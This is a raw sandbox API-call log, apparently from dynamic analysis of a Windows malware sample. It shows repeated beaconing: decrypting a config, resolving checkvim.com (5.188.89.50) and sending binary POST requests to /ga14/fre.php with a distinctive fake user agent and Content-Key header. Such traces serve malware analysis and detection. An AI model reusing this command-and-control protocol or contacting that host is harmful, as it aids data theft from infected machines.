[0269.860] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0269.860] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0269.860] GetProcessHeap () returned 0x840000 [0269.860] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0269.860] GetProcessHeap () returned 0x840000 [0269.860] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0269.860] GetProcessHeap () returned 0x840000 [0269.860] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f950 | out: hHeap=0x840000) returned 1 [0269.860] GetProcessHeap () returned 0x840000 [0269.860] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb48 [0269.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.861] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0269.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.867] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f710) returned 1 [0269.875] GetProcessHeap () returned 0x840000 [0269.875] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0269.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.877] CryptImportKey (in: hProv=0x86f710, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e970) returned 1 [0269.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.878] CryptSetKeyParam (hKey=0x87e970, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0269.880] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.880] CryptSetKeyParam (hKey=0x87e970, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0269.880] GetProcessHeap () returned 0x840000 [0269.880] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0269.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.881] CryptDecrypt (in: hKey=0x87e970, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb48, pdwDataLen=0x19f9a4 | out: pbData=0x87fb48, pdwDataLen=0x19f9a4) returned 1 [0269.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.882] CryptDestroyKey (hKey=0x87e970) returned 1 [0269.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0269.883] CryptReleaseContext (hProv=0x86f710, dwFlags=0x0) returned 1 [0269.883] GetProcessHeap () returned 0x840000 [0269.883] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0269.884] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0269.884] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0269.885] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0269.885] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0269.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0269.887] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0269.887] GetProcessHeap () returned 0x840000 [0269.887] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0269.887] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0269.888] GetProcessHeap () returned 0x840000 [0269.888] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c78 [0269.888] socket (af=2, type=1, protocol=6) returned 0x3f4 [0269.888] connect (s=0x3f4, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0269.957] FreeAddrInfoW (pAddrInfo=0x8713f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0269.958] GetProcessHeap () returned 0x840000 [0269.958] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86ff90 [0269.958] GetProcessHeap () returned 0x840000 [0269.958] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0269.958] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0269.960] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0269.960] GetProcessHeap () returned 0x840000 [0269.960] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0269.960] GetProcessHeap () returned 0x840000 [0269.960] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0269.960] GetProcessHeap () returned 0x840000 [0269.960] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f998 [0269.960] GetProcessHeap () returned 0x840000 [0269.960] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0269.961] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0269.962] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0269.962] GetProcessHeap () returned 0x840000 [0269.962] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0269.962] GetProcessHeap () returned 0x840000 [0269.962] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0269.962] send (s=0x3f4, buf=0x873a58*, len=237, flags=0) returned 237 [0269.963] send (s=0x3f4, buf=0x87eb58*, len=159, flags=0) returned 159 [0269.963] GetProcessHeap () returned 0x840000 [0269.963] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0269.963] recv (in: s=0x3f4, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0270.360] GetProcessHeap () returned 0x840000 [0270.360] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0270.360] GetProcessHeap () returned 0x840000 [0270.360] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0270.360] GetProcessHeap () returned 0x840000 [0270.360] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0270.360] GetProcessHeap () returned 0x840000 [0270.360] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86ff90 | out: hHeap=0x840000) returned 1 [0270.360] closesocket (s=0x3f4) returned 0 [0270.361] GetProcessHeap () returned 0x840000 [0270.361] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c78 | out: hHeap=0x840000) returned 1 [0270.361] GetProcessHeap () returned 0x840000 [0270.361] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0270.361] GetProcessHeap () returned 0x840000 [0270.361] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0270.361] GetProcessHeap () returned 0x840000 [0270.361] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0270.361] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x11c8) returned 0x3f4 [0270.363] Sleep (dwMilliseconds=0xea60) [0270.365] GetProcessHeap () returned 0x840000 [0270.365] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f998 [0270.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0270.366] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0270.376] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0270.376] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0270.386] GetProcessHeap () returned 0x840000 [0270.386] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0270.387] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0270.388] CryptImportKey (in: hProv=0x86f248, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e670) returned 1 [0270.388] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0270.451] CryptSetKeyParam (hKey=0x87e670, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0270.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0270.452] CryptSetKeyParam (hKey=0x87e670, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.452] GetProcessHeap () returned 0x840000 [0270.452] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0270.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0270.453] CryptDecrypt (in: hKey=0x87e670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f998, pdwDataLen=0x19f9a4 | out: pbData=0x87f998, pdwDataLen=0x19f9a4) returned 1 [0270.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0270.455] CryptDestroyKey (hKey=0x87e670) returned 1 [0270.455] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0270.456] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0270.456] GetProcessHeap () returned 0x840000 [0270.456] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0270.456] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0270.457] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0270.458] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0270.458] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0270.459] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0270.459] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0270.460] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0270.460] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0270.460] GetProcessHeap () returned 0x840000 [0270.460] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0270.460] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0270.461] GetProcessHeap () returned 0x840000 [0270.461] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0270.461] GetProcessHeap () returned 0x840000 [0270.461] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0270.461] GetProcessHeap () returned 0x840000 [0270.461] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0270.461] GetProcessHeap () returned 0x840000 [0270.461] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fdd0 [0270.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0270.462] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0270.468] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0270.469] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0270.476] GetProcessHeap () returned 0x840000 [0270.477] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0270.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0270.478] CryptImportKey (in: hProv=0x86f688, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6f0) returned 1 [0270.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0270.479] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0270.480] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0270.480] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.480] GetProcessHeap () returned 0x840000 [0270.480] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0270.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0270.481] CryptDecrypt (in: hKey=0x87e6f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fdd0, pdwDataLen=0x19f9a4 | out: pbData=0x87fdd0, pdwDataLen=0x19f9a4) returned 1 [0270.482] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0270.482] CryptDestroyKey (hKey=0x87e6f0) returned 1 [0270.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0270.484] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0270.484] GetProcessHeap () returned 0x840000 [0270.484] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0270.484] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0270.485] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0270.485] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0270.486] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0270.486] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0270.487] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0270.487] GetProcessHeap () returned 0x840000 [0270.487] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713f8 [0270.539] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0270.541] GetProcessHeap () returned 0x840000 [0270.541] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c68 [0270.541] socket (af=2, type=1, protocol=6) returned 0x3f8 [0270.541] connect (s=0x3f8, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0270.648] FreeAddrInfoW (pAddrInfo=0x8711a0*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0270.648] GetProcessHeap () returned 0x840000 [0270.648] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0270.648] GetProcessHeap () returned 0x840000 [0270.648] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0270.649] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0270.650] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0270.650] GetProcessHeap () returned 0x840000 [0270.650] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0270.650] GetProcessHeap () returned 0x840000 [0270.650] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0270.650] GetProcessHeap () returned 0x840000 [0270.651] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fc68 [0270.651] GetProcessHeap () returned 0x840000 [0270.651] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0270.651] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0270.652] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0270.653] GetProcessHeap () returned 0x840000 [0270.653] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0270.653] GetProcessHeap () returned 0x840000 [0270.653] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0270.653] send (s=0x3f8, buf=0x873a58*, len=237, flags=0) returned 237 [0270.653] send (s=0x3f8, buf=0x87eb58*, len=159, flags=0) returned 159 [0270.653] GetProcessHeap () returned 0x840000 [0270.653] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0270.653] recv (in: s=0x3f8, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0270.997] GetProcessHeap () returned 0x840000 [0270.997] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0270.997] GetProcessHeap () returned 0x840000 [0270.997] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fc68 | out: hHeap=0x840000) returned 1 [0270.997] GetProcessHeap () returned 0x840000 [0270.997] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0270.997] GetProcessHeap () returned 0x840000 [0270.997] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870128 | out: hHeap=0x840000) returned 1 [0270.998] closesocket (s=0x3f8) returned 0 [0270.998] GetProcessHeap () returned 0x840000 [0270.998] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c68 | out: hHeap=0x840000) returned 1 [0270.998] GetProcessHeap () returned 0x840000 [0270.998] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0270.998] GetProcessHeap () returned 0x840000 [0270.998] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0270.998] GetProcessHeap () returned 0x840000 [0270.998] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713f8 | out: hHeap=0x840000) returned 1 [0270.998] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1224) returned 0x3f8 [0271.000] Sleep (dwMilliseconds=0xea60) [0271.001] GetProcessHeap () returned 0x840000 [0271.001] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb00 [0271.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.002] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0271.125] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.126] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fd70) returned 1 [0271.132] GetProcessHeap () returned 0x840000 [0271.132] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0271.133] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.133] CryptImportKey (in: hProv=0x86fd70, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7b0) returned 1 [0271.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.135] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0271.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.136] CryptSetKeyParam (hKey=0x87e7b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0271.136] GetProcessHeap () returned 0x840000 [0271.136] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0271.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.137] CryptDecrypt (in: hKey=0x87e7b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb00, pdwDataLen=0x19f9a4 | out: pbData=0x87fb00, pdwDataLen=0x19f9a4) returned 1 [0271.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.137] CryptDestroyKey (hKey=0x87e7b0) returned 1 [0271.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.138] CryptReleaseContext (hProv=0x86fd70, dwFlags=0x0) returned 1 [0271.138] GetProcessHeap () returned 0x840000 [0271.138] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0271.139] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0271.139] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0271.140] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0271.140] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0271.141] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0271.141] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0271.142] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0271.142] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0271.142] GetProcessHeap () returned 0x840000 [0271.142] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0271.142] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0271.143] GetProcessHeap () returned 0x840000 [0271.143] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0271.143] GetProcessHeap () returned 0x840000 [0271.143] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0271.143] GetProcessHeap () returned 0x840000 [0271.143] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0271.143] GetProcessHeap () returned 0x840000 [0271.143] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fcf8 [0271.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.144] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0271.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0271.149] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f930) returned 1 [0271.162] GetProcessHeap () returned 0x840000 [0271.162] RtlAllocateHeap (HeapHandle=0x840000, 